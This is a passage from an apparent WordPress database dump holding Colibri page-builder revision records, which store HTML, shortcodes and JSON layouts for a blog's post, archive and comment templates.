----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n <!---->\n <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n </div>\n <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_post','','inherit','closed','closed','','31-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',31,'https://gsudice.dataconn.net/?p=62',0,'revision','',0),(63,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"34-m27\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":107,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"34-m28\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":108,\"type\":\"main\"}],\"id\":\"34-m26\",\"parentId\":\"34-m25\",\"partialId\":34,\"styleRef\":106,\"type\":\"main\"}],\"id\":\"34-m25\",\"parentId\":\"34-m2\",\"partialId\":34,\"styleRef\":105,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"slot\":null,\"parentId\":\"34-m4\",\"index\":0,\"id\":\"34-m5\",\"partialId\":34,\"styleRef\":111,\"type\":\"main\",\"props\":{\"showPlaceholder\":false}},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"100\"}}}}},\"id\":\"34-m7\",\"parentId\":\"34-m6\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"separator\":\"| \",\"showIcons\":false,\"dateFormat\":\"M j\"},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m8\",\"partialId\":34,\"styleRef\":114,\"type\":\"main\"},{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":false},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m9\",\"partialId\":34,\"styleRef\":115,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"id\":\"34-m10\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":116,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-excerpt\",\"id\":\"34-m11\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":117,\"type\":\"main\",\"props\":{\"maxLength\":\"16\"}}],\"styleRef\":113,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m6\",\"partialId\":34,\"styleRef\":112,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m13\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":true,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":true,\"separator\":\"\"},\"slot\":null,\"parentId\":\"34-m13\",\"index\":0,\"id\":\"34-m14\",\"partialId\":34,\"styleRef\":120,\"type\":\"main\"}],\"styleRef\":119,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m15\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"34-m17\",\"parentId\":\"34-m16\",\"partialId\":34,\"styleRef\":123,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m15\",\"index\":0,\"id\":\"34-m16\",\"partialId\":34,\"styleRef\":122,\"type\":\"main\"}],\"styleRef\":121,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m12\",\"partialId\":34,\"styleRef\":118,\"type\":\"main\"}],\"id\":\"34-m4\",\"parentId\":\"34-m3\",\"partialId\":34,\"styleRef\":110,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"34-m2\",\"index\":0,\"id\":\"34-m3\",\"partialId\":34,\"styleRef\":109,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m19\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m19\",\"index\":0,\"id\":\"34-m20\",\"partialId\":34,\"styleRef\":126,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"prevLabel\":\"Previous\",\"stateType\":\"hover\"}}],\"styleRef\":125,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m21\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"34-m21\",\"index\":0,\"id\":\"34-m22\",\"partialId\":34,\"styleRef\":128,\"type\":\"main\",\"props\":{\"stateType\":\"\"}}],\"styleRef\":127,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m23\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m23\",\"index\":0,\"id\":\"34-m24\",\"partialId\":34,\"styleRef\":130,\"type\":\"main\",\"props\":{\"stateType\":\"hover\"}}],\"styleRef\":129,\"type\":\"main\"}],\"parentId\":\"34-m2\",\"index\":1,\"id\":\"34-m18\",\"partialId\":34,\"styleRef\":124,\"type\":\"main\"}],\"parentId\":\"34-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Posts\",\"attrs\":{\"id\":\"blog-posts\"}},\"id\":\"34-m2\",\"partialId\":34,\"styleRef\":104}],\"id\":\"34-m1\",\"partialId\":34,\"styleRef\":103,\"type\":\"main\"}','','','inherit','closed','closed','','35-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',35,'https://gsudice.dataconn.net/?p=63',0,'revision','',0),(64,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22435-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%22435-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22435-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22435-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]</div>\n </div>\n</div>','main_archive','','inherit','closed','closed','','34-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',34,'https://gsudice.dataconn.net/?p=64',0,'revision','',0),(65,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"40-m5\",\"parentId\":\"40-m4\",\"partialId\":40,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"40-m5\",\"index\":1,\"id\":\"40-m6\",\"partialId\":40,\"styleRef\":143,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":142,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":1,\"id\":\"40-m4\",\"partialId\":40,\"styleRef\":141,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"parentId\":\"40-m3\",\"id\":\"40-m7\",\"partialId\":40,\"styleRef\":144,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-meta\",\"parentId\":\"40-m3\",\"id\":\"40-m8\",\"partialId\":40,\"styleRef\":145,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"| \"},\"slot\":null,\"index\":3},{\"name\":\"hop-post-excerpt\",\"id\":\"40-m9\",\"parentId\":\"40-m3\",\"partialId\":40,\"styleRef\":146,\"type\":\"main\"},{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"40-m11\",\"parentId\":\"40-m10\",\"partialId\":40,\"styleRef\":148,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":4,\"id\":\"40-m10\",\"partialId\":40,\"styleRef\":147,\"type\":\"main\"}],\"id\":\"40-m3\",\"parentId\":\"40-m2\",\"partialId\":40,\"styleRef\":140,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"40-m1\",\"index\":0,\"id\":\"40-m2\",\"partialId\":40,\"styleRef\":139,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"40-m13\",\"parentId\":\"40-m12\",\"partialId\":40,\"styleRef\":150,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m14\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m14\",\"index\":0,\"id\":\"40-m15\",\"partialId\":40,\"styleRef\":152,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"stateType\":\"hover\",\"prevLabel\":\"Back\"}}],\"styleRef\":151,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\"